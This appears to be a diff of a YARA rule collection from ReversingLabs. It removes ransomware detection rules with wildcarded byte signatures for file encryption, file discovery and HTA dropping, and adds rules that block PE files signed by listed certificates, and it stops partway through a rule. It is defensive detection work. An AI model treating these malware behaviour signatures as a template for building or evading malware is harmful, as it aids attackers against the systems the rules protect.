"aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17236-L17252" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Armage" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 - ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89 - 95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ?? - 8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24 - ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42 - ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? - 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ?? - ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24 - ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ?? - ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? - ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8D 45 ?? 89 04 24 E8 - } - $encrypt_files_p2 = { - 8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D - 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? - ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D - ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 - 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 - E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 - C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24 - E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 - 75 ?? EB - } - $find_files_p1 = { - 55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? - 8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1 - 89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B - 45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ?? - 2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 - 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ?? - ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8 - } - $find_files_p2 = { - 8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B - 4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9 - ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8 - ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 - 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ?? - 89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ?? - ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ?? - ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3 - } - $enum_resources_p1 = { - 55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ?? - 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 - 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB - ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ?? - ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83 - } - $enum_resources_p2 = { - 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? - ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ?? - ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89 - 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B - 48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8 - 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ?? - ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC - ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB - } - condition: - uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Citizen Travel Ltd" and pe.signatures[i].serial=="57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE { meta: - description = "Yara rule that detects Badbeeteam ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "39490b21-34b9-51cb-a3ed-672b3186a233" - date = "2020-11-13" - modified = "2020-11-13" + id = "e8575a71-124b-5040-91b1-ccad371e10da" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17254-L17270" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Badbeeteam" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? - ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? - 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? - 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57 - 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? - ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 - ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? - 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D - } - $find_files_p2 = { - 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? - ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B - D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D - ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? - 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? - ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 - C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 - ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? - 51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? - ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C - 24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? - ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ?? - ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89 - 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8 - ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3 - E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3 - A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ?? - ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B - 70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ?? - 58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69 - } - $encrypt_files_p2 = { - 7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? - ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ?? - 8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56 - E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? - 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 - 6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74 - ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 - 83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? - ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8 - ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? - 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ?? - 72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44 - 24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? - ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24 - ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ?? - ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D - C3 - } - $drop_hta_file_p1 = { - 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89 - C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59 - 5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39 - 3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? - ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89 - 84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89 - 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? - ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? - 8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ?? - ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A - } - $drop_hta_file_p2 = { - 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 - 31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89 - F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D - 74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - 89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 - 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 - 8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ?? - ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ?? - 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ENP Games Co., Ltd." and pe.signatures[i].serial=="07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE +{ + 